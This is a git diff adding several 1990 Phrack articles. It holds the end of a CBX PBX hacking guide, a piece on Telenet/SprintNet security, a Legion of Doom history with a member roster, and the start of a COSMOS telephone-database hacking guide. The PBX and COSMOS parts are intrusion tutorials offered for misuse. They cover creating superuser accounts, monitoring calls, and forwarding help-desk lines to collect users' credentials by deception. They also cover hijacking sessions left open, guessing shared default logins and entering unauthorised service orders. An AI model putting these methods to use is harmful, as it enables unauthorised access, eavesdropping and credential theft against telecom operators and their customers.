+UP                 VERIFY              XDEF                XMIT
+XPND
+     These commands can be executed from and '% ' prompt.  If the command is
+followed by a '?', more information will be supplied about the command.
+Using the ICI
+----- --- ---
+     The Interactive Configuration Interface controls immediate changes in
+the switch and PBX environment.  The Utility is explained in great detail
+through the actual running of it.  You can access the ICI by typing:
+% CNFG
+                       CBXII/9000
+        INTERACTIVE  CONFIGURATION INTERFACE
+                         CPU 2
+15:14:32 ON FRIDAY 5/02/1990
+COMMAND:
+      This is the main command prompt.  From here you can exercise the '?'
+help list to get valid commands.  There are four phases of the ICI utility:
+Modify, Create, List, and Delete.  These can be used on Extentions, Trunks,
+Logon accounts, Feature Group sequences, Data_line access, Trunk Groups, ect.
+The following is a sample of using 'list' to list a current extention in the
+PBX:
+                               _Forward to EXTN 2000
+COMMAND: LIST EXT 4038        /                            _Outside number
+                             /             FORWARD ON     /  to forward to
+                           FORWARDING     BSY RNA DND    /
+   EXTN     TYPE   COS   TARGET1 TARGET2  I E I E I E RINGDOWN  NAME
+   ----     ----   ---   ------- -------  - - - - - - --------  ----------
+DS 4038     EXTN   56    2000             1 1 1 1 1 1 95551212  R.STABELL
+    \          \    \                     /   /    \               \
+    Extention  /     -Class of service   if  R    Auto. Forward   Owner of
+              --Type of line            BUSY  I   No Matter What   EXTN.
+                (Reg. Extention)               N
+                                                G
+Note: The 1's specifies to forward to target#1    & NO ANSWER
+      (As 2's would mean forward to #2 target)
+     This should detail how to modify a listing like above using the 'MODIFY'
+command in the ICI.  Once modified, all transactions are processed immediately.
+Using the 'Delete' command one can delete extentions, trunks, ect.
+     So now we have the following commands in ICI: MODIFY, DELETE, LIST, CREATE.
+Each can be used with the following "Nouns" to modify that "Noun":
+BUTTON_120         BUTTON_240          CDR_EXCLUDE         CNFG_ERRORS
+CNFG_QUEUE         CNFG_STATUS         CNFG_USERS          COM_GROUP
+COS_FEAT           DATA_ACCESS         DATA_DEVICE         DATA_GROUP
+DATA_LINE          DATA_SUBMUX         DLI                 ETS
+EXTEN              FAC                 FAC_TYPE            FAMILY
+FEAT_CODE          FIRST_DIGIT         HD_GROUP            LEX
+LOGON_PROFILE      MAP                 MEM_PARTS           PARAM
+PICK               POWER               Q_TYPE              ROUTE_LIST
+RP                 RPD                 RPI                 RPS_120S_ON
+RPS_240S_ON        SAT_NAME            SEARCH_SEQ          SECTION
+SECURITY_GROUP     SERVICE_LIST        SIO_PARTS           SLI
+SPEED              T1D3                T1D3_GRP            TRUNK
+TRUNK_GROUP        VPC
+      The FAMILY, LOGON_PROFILE, and CNFG_USER all deal with the accounts on
+the system.  One can use MODFIY or CREATE to set them up an account with SU
+access.  The FAMILY noun is the listing of the groups with different access,
+to different "nouns" available. I.E.: Not everyone can access the CHANGE
+LOGON_PROFILE to create an account.
+      To create an account with SU access, type (while in ICI):
+% CREATE LOGON_PROFILE
+ENTER NAME (1-12 CHAR): TEST
+ENTER PASSWORD: TEST
+RETYPE: TEST
+      Next it will ask you for a family.  For SU access, type "SYSTEM_ADMIN".
+After family, the machine should prompt you for a "verb". Verbs are the actual
+functions or commands, so in this environment you can set the commands a user
+can access.  So, for SU, enter "ALL" for every command access.
+      To get a valid listing of users online, try this:
+% LIST CNFG_USERS
+NUMBER OF USERS    MAX NUMBER OF USERS
+     3                  5
+PORT    USER_NAME    START_TIME  HOW_LONG
+17      SU           17:47:57    0:28:34
+2       FIELD        18:16:03    0:0:28
+3       MARYB        18:16:03    0:10:03
+
+Using the Monitoring Utility
+----- --- ---------- -------
+      This command is one of the more powerful commands in the CBXxx system.
+The monitor command should be invoked from within the main function command
+level and not in the ICI level.  The monitoring command allows you to actually
+watch or monitor TRUNKS and EXTENTIONS.  So, if I were to type:
+% MONITOR EXT 4038
+10:02:43 ON FRIDAY MAY/02/1990
+EXT#   STATE            DI  CODE  DIGITS         PROCESS      STATUS
+----   ---------------  --  ----  -------------  ------------ ------
+4038   IDLE                                      STN FWD NUM   FWD
+ \         \                                     /    /    /    \
+Extention   Not in use                   Standard     \   /        Forwarded
+                                         Extention     \ /
+                                                    Forwarded to
+                                                     a number
+      This shows the extention to be IDLE and not in use.  But, with forwarded
+call processes to a standard number.  You would have to use ICI to look up the
+number it's forwarded to if you wanted.
+% MONITOR EXT 4038
+10:03:44 ON FRIDAY MAY/11/1990
+EXT#    STATE           DI  CODE  DIGITS         PROCESS     STATUS
+----    --------------  --  ----  -------------  ----------- ------
+4038    DIAL TONE                                STN FWD NUM  FWD
+4038    DIALING         Y         9             /    \   \     \
+4038    DIALING         Y         92           S     F    N     \Extention
+4038    DIALING         Y         923           t     o    u       Forwarded
+4038    DIALING         Y         9233           a N   r    m
+4038    DIALING         Y         92334           n u   w    b
+4038    DIALING         Y         923345           d m   a    e
+4038    DIALING         Y         9233456           a b   r    r
+4038    DIALING         Y         92334564           r e   d
+4038    CONN T025N      N              \              d r   e
+ /             \        /               \                    d
+ \              \       \_Dialing NO     \_Number dialed
+  \_Extention    \
+               Connected to
+              Outside trunk T025N
+     This monitoring shows the extention actually dialing the number, and then
+connecting to an outside truck.  Unfortunatley, one we cannot monitor without
+access to a bell switch.
+     Monitoring can also be done with trunks.  I will not display any trunk
+monitoring since it is quite simple to decypher.
+Manipulating the switch
+------------ --- ------
+     There are many ways you can manipulate the CBX's to gain accounting
+information on data lines within the PBX environment.  One sure-fire method
+would be to forward an actual data dial-up extention to a bridge or loop and
+then write an emulation to intercept the user's account information real-time
+as they connect to your fake dial-up.
+     Or perhaps if an university uses the CBX, one could maybe forward the
+computer help desk extention to a bridge or loop and as an unsuspecting user
+calls up, ask him what machine and account info he has access to for a help
+log sheet you are taking.
+    Who cares. Who knows.  There are thousands of things you can do to use
+the CBX to your advantage.  Hell, you have the whole switch at your command.
+DH -  05/11/90
+
+_______________________________________________________________________________
diff --git a/phrack31/4.txt b/phrack31/4.txt
new file mode 100644
index 0000000..188473c
--- /dev/null
+++ b/phrack31/4.txt
@@ -0,0 +1,90 @@
+                             ==Phrack Inc.==
+             Volume Three, Issue Thirty-one, Phile #4 of 10
+              /  Everything you always wanted to know..  \
+      /  about Telenet Security, But were to stupid to find out. \
+                            By Phreak_Accident
+     Ever since the early 80's GTE Telenet has been expanding their public
+packet switching system to hold enormous amounts of users.  Currently GTE
+SprintNet (Yes, Telenet is out, SprintNet is in.) has over 300 nodes in the
+United States and over 70 other nodes abroad.  SprintNet provides private
+X.25 networks for larger companies that may have the need.  These private
+networks are all based on SprintNet's 3270 Dedicated Access Facility which
+is currently operating for public use, Hence for the major security Sprint-
+Net has aquired.
+      SprintNet's security department is a common idea of what any large
+public packet network should be.  With their home office located in Virgina
+(703), most Hacker's who run into trouble with them would wind up talking
+to Steve Mathews (Not the head of security but a prime force against the
+major attacks Sprintnet recieves from Hackers anually.), who is a very
+intelligable security analysist that deals with this type of problem daily.
+      Because of Steve's awarness on Hackers invading "His" system (As most
+security personnel refer to the system's they work for as their own.), He
+often does log into Bulletin Boards accross the country looking for Sprint-
+Net related contraband.  At the time of this article, Steve is running an
+investigation on "Dr. Dissector's" NUAA program. (NUA attacker is a Sprint-
+Net NUA scanner.)  Besides this investigation, he currently stays in contact
+with many Hackers in the United States and Abroad.  It seems Steve recieves
+many calls a month from selected Hackers that have interests in the Security
+of SprintNet.  Wow.  Who the Hell would want to call this guy.  From many
+observations of Steve Mathews, I find him to in deed be the type to feel a
+bit scared of Hackers.  Of course, his fright is really quite common amoung
+security personnel since most fear for their systems as well as themselves.
+(Past experiences have showed them not to take Hackers lightly, Hence they
+have more contacts then 60 rolodex's put together.)
+       For now, let's forget Steve Mathews.  He's not important an important
+influence in this article.  Trying to pin a one-person in a security depart-
+ment that handles security is like finding a someone on a pirate board that
+doesn't use the word "C0DE" in their daily vocabulary.
+       Telenet's main form of security lies in their security software called
+TAMS (Telenet Access Manager System).  The TAMS computers are located in Res-
+tin, Virginia but are accessable throughout the network.  Mostly, the main
+functions of TAMS are to:
+       * Check to see if the NUI/Password entered is a valid one.
+       * Check to see if the Host has list of NUI's that can access
+            that host.  If another NUI is used, a Rejection occurs.
+       * Processes SprintNet's CDR (Call Detail Recording), which
+            includes Source and Destination, Time of call, Volumes
+            of data recieved, and the Total time of the call.
+       * Can be used by host to add an optional "ALPHA" NUA for "easy"
+            access.
+       * Can secure Hosts further by adding an NUA security password.
+       * Restricts calls without an NUI for billing (I.E. No collect
+         calls to be processed).
+       * Accepts all calls to host as a prepaid call (I.E. Accepts all
+         calls).
+     TAMS is really for the handling of NUI and corresponding NUA's, therefore
+being a security concept.  TAMS holds all the data of NUI's and restricting NUAS
+for the ENTIRE network.  If one could gain the access to TAMS, one could have
+the entire network at his/her disposal.  This of course if highly impossible
+to SprintNet's security department, but not for a couple of hackers I have ran
+into.  Yes, TAMS is quite interesting.
+      In other aspects of SprintNet security, lets focus on the actual X.25
+software that they use.  Anybody who tells you that Telenet can monitor the
+sessions currently taking place on THEIR network is WRONG (And probably very
+stupid as well).  Monitoring is a basic feature of all X.25 networks, whether
+it's a little PeeShooter network or not, they can and do monitor sessions.
+       Of course their are far to many calls being placed on SprintNet to be
+monitored, but a scared host can always request a full CDR to be put on their
+address to record all sessions comming in on that NUA.  Such as the many re-
+corded sessions of the ALTOS chat(s) in Germany that was a hot-spot for many
+Hackers across the United States and Abroad.  After the detection of ALTOS,
+through the hundereds of illegally used NUIs, CDR's and direct host monitoring
+were used on the ALTOS hosts.  As far as prosecutions concern, I doubt their
+were any.
+        Now, as far as other security software on SprintNet, they have a call
+tracking service that is called AUTOTRAIL.  Basically, AUTOTRAIL traces the
+connections through the DNIC's and back to the orginating NUI and/or NODE loca-
+tion that placed the call.
+        AUTOTRAIL has nothing to do with ANI.  Not at all.  In fact, the many
+dialups that lead into SprintNet's PDM gateway do NOT have any type of ANI.
+That is basically a telephony problem.  ALthough I would think twice about
+messing with a dialup that is run on a GTE carrier.  That's up to you though.
+        Another aspect of security in which Telenet offers is an ASCII tape
+that can be obtained by a host customer, which contains all CDR information of
+any connection to that host for the last week/month/year.  So, it is obvious
+to say that SprintNet does have a hudge database of all CDRs.  Yes, another
+point:  This database is located in the TAMS computer.  Hmm, ahh.. Wouldn't
+that be neat.
+:PA
+
+_______________________________________________________________________________
diff --git a/phrack31/5.txt b/phrack31/5.txt
new file mode 100644
index 0000000..e77a087
--- /dev/null
+++ b/phrack31/5.txt
@@ -0,0 +1,169 @@
+                               ==Phrack Inc.==
+                Volume Three, Issue Thirty-one, Phile #5 of 10
+
+The History of The Legion Of Doom
+--- ------- -- --- ------ -- ----
+During the summer of 1984 an idea was formulated that would ultimately
+change the face of the computer underground forever.  This particular
+summer, a huge surge of interest in computer telecommunications placed
+an incredibly large number of new enthusiasts on the national computer scene.
+This crowd of people all seeking to learn as much as possible
+began to put a strain on the nation's bulletin board scene, as the novices
+stormed the phonelines in search of knowledge.  From out of this chaos
+came a need for learned instructors to help pass on their store of
+information to the new throngs.
+One of the most popular bulletin boards of the day was a system in New York
+state called Plovernet, which was run by a person who called himself
+Quasi-Moto.  This BBS was so heavily trafficked, that a major long
+distance company began blocking all calls to its number (516-935-2481).
+The co-sysop of Plovernet was a person known as Lex Luthor.  At the time
+there were a few hacking groups in existence, such as Fargo-4A and Knights of
+Shadow.  Lex was admitted into KOS in early 1984, but after making a few
+suggestions about new members, and having them rejected, Lex decided to
+put up an invitation only BBS and to start forming a new group.
+Starting around May of 1984, Lex began to contact those people who he had
+seen on BBSes such as Plovernet and the people that he knew personally
+who possessed the kind of superior knowledge that the group he envisioned
+should have.  Many phone calls and Alliance Teleconferences later, the
+group of individuals who made up the original Legion of Doom were compiled.
+They were:
+               Lex Luthor
+               Karl Marx
+               Mark Tabas
+               Agrajag the Prolonged
+               King Blotto
+               Blue Archer
+               EBA
+               The Dragyn
+               Unknown Soldier
+The group originally consisted of two parts:  Legion of Doom, and Legion
+of Hackers.  The latter was a sub-group of the first, comprised
+of people who were more advanced in computer related subjects.  Later on,
+as members began to all become more computer-based, the Legion of Hackers
+was absolved.  (The name "Legion of Doom" came from the cartoon series
+"Superfriends," in which Lex Luthor, Superman's arch rival, led a group
+by the same name)
+The actual Legion of Doom bulletin board was quite ahead of its time.
+It was one of the first "Invitation-only" hacking based BBSes; it was the
+first BBS with security that caused the system to remain idle until
+a primary password was entered; and it was the first hacking BBS to deal
+with many subjects in close detail, such as trashing and social
+engineering.  The BBS underwent three number changes and three different
+login procedures during its life.  At its height, the BBS had over
+150 users and averaged about 15 posts per day.  This may seem
+high when compared to contemporary BBSes, but this was a private system,
+with only very-competent users, so the quality of messages content was always
+high.
+There was always some confusion that falsely assumed since someone
+was on the LOD BBS, that they were a member of the group.  In fact,
+only a handful of the total LOD membership were ever on the actual
+LOD BBS.
+The Legion of Doom also had special subboards created for its members on
+other BBSes after the home base BBS went offline.  The first was on
+Blottoland, the next on Catch-22, followed by one on the Phoenix Project,
+and the last on Black Ice Private.  The group's members have usually tried to
+keep a low profile publicly, and usually limited their trade of information
+to select private BBSes and personal telephone conversations.  This adherence
+to privacy has always added to the LOD mistique.  Since most people didn't
+know exactly what the group was involved in, or experimenting with, people
+always assumed that it was something far too detailed or sensitive to be
+discussed.  For the most part, this was not true, but it did not help to
+diminish the paranoia of security personnel that LOD was after their
+company's systems.
+The group has undergone three distinct phases, each a result of membership
+changes.  The first phase ended with the busts of Marx, Tabas, Steve Dahl,
+Randy Smith, X-man, and the abandonment by Agrajag and King Blotto.
+The group lay semi-dormant for several months, until a resurgence
+in the summer of 1986, in which several new members were admitted, and a new
+surge of would-be hackers appeared, ready to be tutored.  This phase again
+ended in a series of busts and paranoia.  The third phase basically revolved
+around Summercon of 1988, where several new members were admitted by those
+LOD members attending the festivites.  The third phase is now at an end
+brought on by busts and related paranoia, again, two years after its onset.
+There is no indication that points to any resurgence in the future, but
+nothing is certain until summer.
+Since its creation, LOD has tried to put out informative files on a wide
+variety of topics of interest to its contemporaries.  These files ranged from
+the first actual scanned directory of Telenet, to files on various operating
+systems.  The LOD Technical Journal was to be a semi-regular electronic
+magazine comprised of such files, and other items of interest to the hacking
+community.  Only three issues of the Technical Journal were produced.  As
+the fourth issue was being pieced together, several members were raided, and
+work on it was abandoned.
+>From the time it was formed continuing up to the present, the Legion of
+Doom has been quite a topic of controversy in the computer underground and
+with computer security professionals.  The Legion of Doom has been
+called everything from "Organized Crime" to "a Communist threat to national
+security" to "an international conspiracy of computer terrorists bent
+on destroying the nation's 911 service."  Nothing comes closer to the
+actual truth than "bored adolescents with too much spare time."
+LOD members may have entered into systems numbering in the tens of
+thousands, they may have peeped into credit histories, they may
+have monitored telephone calls, they may have snooped into files and
+buffered interesting text, they may still have total control over
+entire computer networks; but, what damage have they done?  None, with
+the exception of unpaid use of CPU time and network access charges.  What
+personal gains have any members made?  None, with the exception of three
+instances of credit fraud that were instigated by three separate greedy
+individuals, without group knowledge.
+The Legion of Doom will long be remembered in the computer underground as
+an innovative and pioneering force, that consistently raised the collective
+level of knowledge, and provided many answers to questions ranging from the
+workings of the telephone system to the structure of computer operating
+systems.  No other group dedicated to the persuit of computer and
+telecommunications knowledge has survived longer, and none probably will.
+The Legion of Doom  1984--1990
+------------------------------------------------------------------------------
+
+Alumni of the Fraternal Order of the Legion of Doom  (Lambda Omega Delta)
+Handle                Entered   Exited    Location       Reasons for leaving
+------------------------------------------------------------------------------
+Lex Luthor            Early 84--          Florida
+Karl Marx             Early 84--Late  85  Colorado       Bust w/Tabas..College
+Mark Tabas            Early 84--Late  85  Colorado       Too numerous to list
+Agrajag the Prolonged Early-84--Late  85  California     Loss of Interest
+King Blotto           Early 84--Late  85  Ohio           College
+Blue Archer           Early 84--Late  87  Texas          College
+EBA         Early 84--          Texas
+The Dragyn            Early 84--Late  86  Minnesota      Loss of Interest
+Unknown Soldier       Early 84--Early 85  Florida        Bust-Toll Fraud
+Sharp Razor           Late  84--Early 86  New Jersey     Bust-Compuserve Abuse
+Sir Francis Drake     Late  84--Early 86  California     Loss of Interest
+Paul Muad'dib         Late  84--Early 86  New York       Modem Broke
+Phucked Agent 04      Late  84--Late  87  California     College
+X-Man                 Late  84--Mid   85  New York       Bust-Blue Boxing
+Randy Smith           Late  84--Mid   85  Missouri       Bust-Credit Fraud
+Steve Dahl            Early 85--Early 86  Illinois       Bust-Credit Fraud
+The Warlock           Early 85--Early 86  Florida        Loss of Interest
+Terminal Man          Early 85--Late  85  Massachusetts  Expelled from Group
+Dr. Who               Early 85--Late  89  Massachusetts  Several Reasons
+The Videosmith        Early 86--Late  87  Pennsylvania   Paranoia
+Kerrang Kahn          Early 86--Mid   89  London, UK     Loss of Interest
+Gary Seven            Early 86--Mid   88  Florida        Loss of Interest
+The Marauder          Early 86--Mid   89  Connecticut    Loss of Interest
+Silver Spy            Late  86--Late  87  Massachusettts College
+Bill from RNOC        Early 87--Late  87  New York       Bust-Hacking
+The Leftist           Mid   87--Late  89  Georgia        Bust-Hacking
+Phantom Phreaker      Mid   87--          Illinois
+Doom Prophet          Mid   87--          Illinois
+Jester Sluggo         Mid   87--          North Dakota
+Carrier Culprit       Mid   87--Mid   88  Pennsylvania   Loss of Interest
+Master of Impact      Mid   87--Mid   88  California     Loss of Interest
+Thomas Covenant       Early 88--Early 90  New York       Bust-Hacking
+The Mentor            Mid   88--Early 90  Texas          Retired
+Necron 99             Mid   88--Late  89  Georgia        Bust-Hacking
+Control C             Mid   88--Early 90  Michigan
+Prime Suspect         Mid   88--          New York
+The Prophet           Mid   88--Late  89  Georgia        Bust-Hacking
+Phiber Optik          Early 89--Early 90  New York       Bust-Hacking
+** AKA **
+Randy Smith           Poof!
+Dr. Who               Skinny Puppy
+Kerrang Kahn          Red Eye
+Phantom Phreaker      ANI Failure / Psychedelic Ranger
+Doom Prophet          Trouble Verify
+Thomas Covenant       Sigmund Fraud / Pumpkin Pete
+Necron 99             The Urvile
+Control C             Phase Jitter
+
+_______________________________________________________________________________
diff --git a/phrack31/6.txt b/phrack31/6.txt
new file mode 100644
index 0000000..fe79381
--- /dev/null
+++ b/phrack31/6.txt
@@ -0,0 +1,1588 @@
+                                ==Phrack Inc.==
+                  Volume Three, Issue Thirty-one, Phile #6 of 10
+
+                        L    OO  DD
+                        L   O  O D D
+                        LLL  OO  DD
+                          PRESENTS
+************************************************************
+************************************************************
+***                                                      ***
+***                     TTT H H EEE                      ***
+***                      T  H H E                        ***
+***                      T  HHH EEE                      ***
+***                      T  H H E                        ***
+***                      T  H H EEE                      ***
+***                                                      ***
+***                                                      ***
+***      DD   EEE FFF III N  N III TTT III V V EEE       ***
+***      D D  E   F    I  NN N  I   T   I  V V E         ***
+***      D  D EEE FFF  I  N NN  I   T   I  V V EEE       ***
+***      D D  E   F    I  N NN  I   T   I  V V E         ***
+***      DD   EEE F   III N  N III  T  III  V  EEE       ***
+***                                                      ***
+***                                                      ***
+***          CCCC  OOO    SS  M   M  OOO    SS           ***
+***         C     O   O  S  S MM MM O   O  S  S          ***
+***         C     O   O   S   M M M O   O   S            ***
+***         C     O   O S  S  M M M O   O S  S           ***
+***          CCCC  OOO   SS   M   M  OOO   SS            ***
+***                                                      ***
+***                                                      ***
+************************************************************
+************************************************************
+                             BY
+                        ERIK BLOODAXE
+PRELUDE
+In the past, many files have been written about COSMOS.  I
+have always been rather disappointed in their quality and in
+their presentation, so I have taken on the responsibility of
+doing one myself.  This should sum up COSMOS for everyone who
+reads it.  It contains formats for very useful commands, an
+entire transaction list, COSMOS "tricks", and a list of all COSMOS
+abbreviations and their formats.
+=============================================================================
+INTRODUCTION
+Bell Labs COmputer System for Mainframe OperationS  (COSMOS)
+is basically just a database for maintaining records of
+equipment and other line information and generating reports
+on that information.  The system is usually set up on a DEC
+PDP 11/45 or 11/70.
+The main responsibilities of the COSMOS system are:
+              Maintaining records
+              Issuing reports
+              Processing service and work orders
+              Assigning telephone numbers
+              Load balancing for switching computers
+              Output of ESS recent change information
+LOGGING ON
+When connecting to COSMOS the system will respond with:
+;Login:  or  LOGIN:
+at which point you enter a username.  The system will then
+prompt:
+PASSWORD:
+at which point you enter the password for that username.
+Finally, the system will prompt:
+WC?
+which asks you to enter the wire center for the exchange you
+will be using in your work.  After successfully completing
+the login sequence you will be given the system prompt which
+will be the two letter id of the wire center you entered and a
+percent sign:  "WC% "
+To log off at this or at any point you can type control-y.
+One of the major flaws in COSMOS security is that unless a
+control-y is received the terminal is not logged out, even if
+the user disconnects.  Many times when you connect to COSMOS,
+you will be dropped right into the "WC% " prompt.  This even
+happens on major BOC packet networks quite often.  If you are
+lucky enough to receive a 'WC#' prompt you have access to the
+COSNIX shell, and can issue various unix-like commands, like
+ls, cd, cat, et cetera.
+COSMOS usernames are usually issued as two letters corresponding to
+whatever center will be using that account, and two numbers.
+EX:  LA01
+Using the above example "LA01" there will most probably be numerous
+"LA" accounts, possibly "LA01" through "LA15" or higher.  This is true
+for most COSMOS usernames.  More often than not, all accounts used by the
+same center will have the same password as well.  Some common usernames
+and their owners are:
+              ROOT     System Manager
+              SYS      System Manager
+              ML       Loop Assignment
+              LA       Loop Assignment
+              DN       Main Distributing Frame
+              IN       Repair Service
+              RS       Repair Service
+              CE       LNAC
+              LK       Account to execute INQuiries only
+              JA       Mizar
+              WLI      Work Load Indicator
+Usernames may vary from BOC to BOC, but these are fairly standard.
+=============================================================================
+COSMOS TRANSACTION COMMANDS
+COSMOS commands are three letter acronyms.  I will explain in
+depth the commands I have found most useful, and then list
+the remainder.  Remember, do not attempt to learn the formats for COSMOS
+transactions online.  You will probably not figure out correct inputs, and
+will most likely cause problems for the system manager and yourself.
+Commands are entered in a specific ways.  The command desired is
+entered at the WC% prompt.  A second string of data is entered at
+the next line which designates the type of transaction desired.
+This line is prefixed with on of the following four letters:
+H - Header Line
+I - In Line
+O - Out Line
+R - Remark Line
+The most commonly used line is the H line.  It is a required input in
+almost all COSMOS transactions.  From the second line on, COSMOS will
+prompt with an underscore "_" as the system prompt, to let the user
+know that it is waiting for input.  When all needed data has been entered,
+the command is executed by typing a "." at the beginning of a new line.
+If you wish to process a command, but stay in command level in order to
+process further commands after the one you are currently entering has
+finished, a ";" can be entered at the beginning of a new line.
+To cancel the transaction you are entering, a "Q" should be entered at
+the beginning of a new line.  To interrupt output, the break character
+is "^C".  When entering criteria, you may enter all like data (all H-line, all
+I-line, etc...) on one line using a "/" between input prefixes:
+EX:  H TN 222-0000,222-9999/RMKT SWBT?/US 1FB
+is the same as entering:
+H TN 222-0000,222-9999
+_H RMKT SWBT?
+_H US 1FB
+One of the most commonly used commands is INQ (Complete
+Circuit Inquiry).  There is also a short form of INQ called
+ISH.  This command requires only the use of H lines.  Multiple H lines
+can be entered to narrow a search or to print multiple reports.
+Valid H line facilities used are:
+              BL       Bridge Lifter
+              CON      Concentrator
+              CP       Cable Pair
+              CKID     Circuit ID
+              MR       Message Register
+              OE       Office Equipment Number
+              PL       Private Line Circuit Number
+              TK       Trunk Cable and Pair Number
+              TN       Telephone Number
+              TP       Tie Pair
+              XN       "X" Number
+              TRE      Transmission Equipment
+              TER      Terminal Number
+              GP       Group Number
+              ORD      Work Order
+EX:  To print information on telephone number 222-2222
+WC% INQ
+H TN 222-2222
+_.
+EX:  To print information on cable pair 11-1111
+WC% INQ
+H CP 11-1111
+_.
+INQ will print a full report whatever circuit you examine, while ISH
+will print a shorter, easier to read report.  Below is an actual ISH
+done on a Telenet node.
+CA% ISH
+H TN 225-8004
+_.
+TN   225-8004
+     ST  AU          DATE 06-03-83   HT GP 0-0081    BTN 225-8004    TYPE X
+OE   006-012-200
+     ST  WK          DATE 03-04-86   CS 1FBH     US 1BH       FEA TNNL
+     LCC TF2
+     LOC WF12003
+TER  0-0081-0001
+     ST  WK
+     RMKG GTE.TELENET
+CP   95-0701
+     ST  WK          DATE 01-24-86    RZ 13
+     LOC WF12009
+TP   6105-0910
+     ST  WK          DATE 01-24-86
+     LOC  F12003
+     LOC  F42001
+     FROM FAC OE  006-012-200     TO FAC TP  6206-0107
+TP   6206-0107
+     ST  WK          DATE 01-24-86
+     LOC  F22029
+     LOC  F42002
+HUNT SEQUENCE FOR TN 225-8004
+  TER 0001-0040
+** ISH COMPLETED 02-29-99  12:00
+CA%
+When you pull an inquiry on a number that you are interested in, you will
+be given its cable pair, its order number, any numbers that connect to
+it through a hunt sequence, and you will see any remarks entered about the
+number.  This information can prove to be very valuable.  For instance:
+You suspect that a company has a modem online, yet you don't want to waste
+time sequentially dialing thousands of numbers.  You can simply enter
+an ISH on the number to get its cable pair, then begin pulling ISH
+reports on cable pairs close to the main one.  Then you need only dial
+twenty or so numbers that are in the same area as the main number, and
+you will find the computer.
+Another extremely valuable command is SIR (Sorting Inquiry by Range).
+With SIR, you can print the circuit information on all lines that match
+specified criteria within a specified range of numbers.  This command
+requires only H line input, but numerous lines may be entered in order to
+narrow down the search.  You may also use the wildcard character ("?") to
+encompass a larger range when doing a SIR.  There are many applications
+for SIR, but I will only show examples on a few I have found to be
+most useful.
+Many times entries have special remarks entered about the circuit.  These
+are usually entered as RMKT (Remarks on Telephone Number), but they may be
+entered as RMKO (Remarks on Office Equipment) or RMKP (Remarks on Cable
+Pair), depending upon what the person entering felt like typing.
+Most of the time the remarks really don't correspond like they should.
+Telephone companies are pretty thorough about remarking on a line that
+they own and they will usually use the RMKT prefix.
+EX:  To find all telephone company (Southwestern Bell) lines in prefix 222
+WC% SIR
+H TN 222-0000,222-9999
+_H RMKT SWBT?
+_.
+The "?" after SWBT acts as a wildcard.  Typing SWB? would perform the same
+search.
+You may also want to search by STT (Telephone number status).  Some types of
+STT are:
+              AU   Auxiliary
+              NP   Non-published
+              OF   Official (telco owned)
+              TS   Test
+Another way to distinguish types of number is by CS (Customer Class of
+Service).  CS values tend to vary from BOC to BOC, but business lines
+will usually look like "1FB", or at least contain a "B".  Residences
+will usually look like "1FR."  Sometimes telco lines are listed as "1OF",
+but may also be entered as "1FB".  On lines in a hunt group, the CS will
+be appended with the letter "H", as "1FBH".
+Let's say a company owns a block on an exchange (333) running from 1000 to
+3500.  You want to find all possible computer numbers in that area.  Chances
+are good that they are not listed.
+EX:
+WC% SIR
+H TN 333-1000,333-3500
+_H STT NP
+_H CS 1FB
+_.
+The above would list all non-published business numbers from 333-1000
+to 333-3500.
+To find all numbers that are translated 800 numbers in the same prefix range
+as above, you can do the following:
+EX:
+WC% SIR
+H TN 333-1000,333-3500
+_H PL ?800?
+_.
+This will prints reports on all private lines registered as 800 numbers.
+There is also a shorter version of SIR, LTN (List Telephone Numbers), and a
+more detailed version, GFR (General Facility Report), but I have found
+SIR to be the better of the three to use for my purposes.
+In order to change line attributes, or to create new lines you will need
+to use two commands SOE (Service Order Entry), and RCP (Recent Change
+Packager).  These two commands are pretty detailed in what they can do,
+so I will just cover a few of their options.
+SOE will allow you to assign a new circuit, and specify the desired telephone
+number, custom calling features, billing telephone number, etc.
+SOE requires both "H" and "I" lines of input.  The best way to enter
+a new service order is to have COSMOS pick your new telephone number and
+assign the needed office equipment number.  If you want to pick your own
+telephone number, the number you pick must have a status (STO) of SP, LI, RS,
+or PD (with a disconnect date before the due date on your new service order).
+This is so that you do not try to assign a number that is currently working
+to your new service order.  You can check this by doing an ISH on all the
+variations of numbers you desire, and checking the STO.  You can also get a
+list of available numbers in a given prefix using the NAI command.  You
+should also do a SIR of recent entries, to try to find the proper format of
+order numbers, so that you do not reuse one, or make one up that is formatted
+incorrectly.  Another method to make sure that you have the correct formatting
+of order numbers is to call the phone company and request the installation of
+a line in the area you are working in.  They will tell you your service order
+number for reference.  Later, you can merely cancel the order.  You will also
+have to find a valid cable pair, so do an ISH on whatever number written in
+your junction box that is not working, and then make sure there is no pending
+connect orders entered on it.
+To enter a service order for a new connection, having COSMOS pick an available
+telephone number and assign proper office equipment numbers, you would do
+the following:
+EX:
+WC% SOE
+H ORD SO123456/OT NC/DD DD-MM-YY   (Use valid Day, Month, Year for Due Date)
+_I TN ?/US 1FR/FEA TNNL/OE ?/CP XX-YYYY   (Use valid cable pair for XX-YYYY)
+_.
+You would now need to enter RCP and make a correctly formatted recent change
+report for the order you entered so RCMAC can pick up the order and directly
+enter it into the switch.  What RCP does is take your order and change it into
+actual switch programming, using templates that are stored in directories
+corresponding to what type of switching equipment is used for that WC.
+(EX:  ess5a)
+EX:  To create a recent change package for the order entered above
+WC% RCP
+H ORD SO123455
+_.
+Using SOE you can specify custom calling features, you can specify billing
+telephone numbers, you can establish service as coin, and several other
+options by adding "I" line information corresponding to that particular
+option.
+              _I CCF XXXXXX       (XXXXXX is valid custom calling features)
+              _I BTN NNX-XXXX     (NNX-XXXX is valid billing TN)
+              _I TT C
+To get a list of spare (available) telephone numbers in a given prefix, you
+can use the NAI (Telephone Number Assignment Inquiry) command.  You only need
+enter H line criteria.  In addition to searching by prefix (NNX), you can
+search by switch type (TYP), or rate zone (RTZ).
+EX:  To select one spare telephone number in 555 and make it reserved status
+WC% NAI
+H TT X/NNX 555/STT RS
+_.
+You may also have NAI print out several available numbers, however, you cannot
+change the status unless you are printing one listing.
+EX:
+WC% NAI
+H TT X/NNX 555/LC XX        (Where XX is a number between 1 and 25)
+_.
+To get a listing of all prefixes that exist in the Wire Center you are
+logged in under, you can use the command DDS (Display DS Table).  This
+command will list the ranges that exist for a given input.
+To list all telephone numbers in a given WC:
+WC% DDS
+H TN ?
+_.
+To list all cable pair ranges:
+WC% DDS
+H CP ?
+_.
+To change from one Wire Center to another, you use the command WCC (Wire
+Center Change).  This is a very straight forward command.
+EX:
+WC% WCC NW
+NW%
+To allow for redirection in your COSMOS commands, you must execute the
+DIO command.  This command is rather important for manipulating commands
+to work for you.
+EX:
+WC% DIO
+To see what transactions other people logged in are running, you can use the
+command TSNAP (on certain generics)
+EX:
+WC% TSNAP
